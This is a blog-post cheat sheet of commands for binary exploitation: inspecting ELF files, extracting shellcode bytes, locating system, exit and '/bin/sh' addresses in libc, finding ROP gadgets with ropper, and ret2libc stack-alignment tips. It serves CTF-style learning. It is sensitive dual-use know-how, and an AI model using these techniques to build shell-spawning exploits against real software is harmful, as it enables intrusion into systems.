Binary Exploitation Cheatsheet

 

ELF INFO 

#Hex to Decimal
printf "%d\n" 0x18

#Get ELF headers
readelf -h hello_world

#Get Program Headers - 9 Headers
readelf --wide -l hello_world

#Get Sections from ean ELF
readelf --wide -S hello_world

#Get the contents of a section 
readelf -x .rodata hello_world

#get the hex data of any section from a binary file 
readelf -x .text hello_world
readelf -x .rodata hello_world

#get a specific function using readelf
readelf -a /usr/lib32/libc-2.31.so | grep mprotect 

#Print Symbols from a binary 
objdump --wide -t symbol

#Object Dump 
objdump -D hello_world

#get shellcode from the binary
for i in $(objdump -d ./Hello_stack |grep "^ " |cut -f2); do echo -n '\x'$i; done; echo


#Generate assembly instructions  - it will generate Hello.S file
gcc -S hello.c

#Linking a file; will generate linke file 0 hello.o  
gcc -c hello.c

#Compile a file 
gcc hello.c -o hello
Make sure to set a breakpoint and run the program before running below commands when trying from GDB 


#Search for system or any function address from a binary using objdump or from 
# gdb- using `p system`
objdump -M intel -D vuln | grep 'system' -A 3 

#Get PLT/GOT function names after disassembling all sections 
objdump -d vuln | grep ">:"

#Display the dynamic relocation entries in the file
#address of functions in the GOT
objdump -R vuln

# Find system address
p system 
xinfo system 

#Find Exit address 
p exit 

#Chek if libc is being used or not - copy libc to current working directory for ease of use. 
# Copy Libc base address 
# Default path = /lib/x86_64-linux-gnu/libc-2.27.so
vmmap libc 

#Find JMP RSP or JMP RAX or any other instruction 
# if you are unable to find an instruction in your vuln binary, search for the string in libc 
ropper 
file ./vuln or file ./libc
search jmp rsp 

#if you are unable to find JMP instruction try CALL 
search call rsp 

#Finding "/bin/sh"
find "/bin/sh"            # peda
search-pattern "sh"       # gef
strings -a -t x libc-2.27.so | grep "/bin/sh"
ropper --file libc-2.27.so --string '/bin/sh'

# Search for ret instruction, look for a single ret without any other instructions. 
ropper --file libc-2.27.so --search "ret"
0x00000000000008aa: ret; 

#When you take an address from libc externally or using ropper, you need to add libc base address that you got from `vmmap libc` first address with the address that you got from ropper or strings. - its the same with any other instructions.  

#Change ropper search depth - 
# 1 - 1 level down, /2/ - 2 levels down
# better to pick a gadget that ends with ret for ret2libc
ropper
> file ./vuln_file or file ./libc
> search /1/ pop rdi 


#Keep the STDIN open 
(cat payload;cat ) | ./vuln


# if we are unable to find the exact instruction 
- Ex; we are looking for `pop rdx; ret;` but found `pop rdx; pop r12; ret;` - after we pass the argument for pop rdx- send some dummy data into pop r12 as shown below
- buffer += pack("<Q",0x414141414141)  #Dummy for pop r12 


#Get Base address of Stack
- set a breakpoint at main and run the program, take the first address of the stack
- you can check if the stack is executable or not here 
vmmap stack 

#Get Base address of LIBC 
vmmap libc 

# When trying any Return2 Exploits 
- better to add extra "ret" address before pop rdi, ret instructions
- this is to avoid 16-bit alignment issues 



Bhanu Namikaze

Bhanu Namikaze is an Ethical Hacker, Security Analyst, Blogger, Web Developer and a Mechanical Engineer. He Enjoys writing articles, Blogging, Debugging Errors and Capture the Flags. Enjoy Learning; There is Nothing Like Absolute Defeat - Try and try until you Succeed.

No comments:

Post a Comment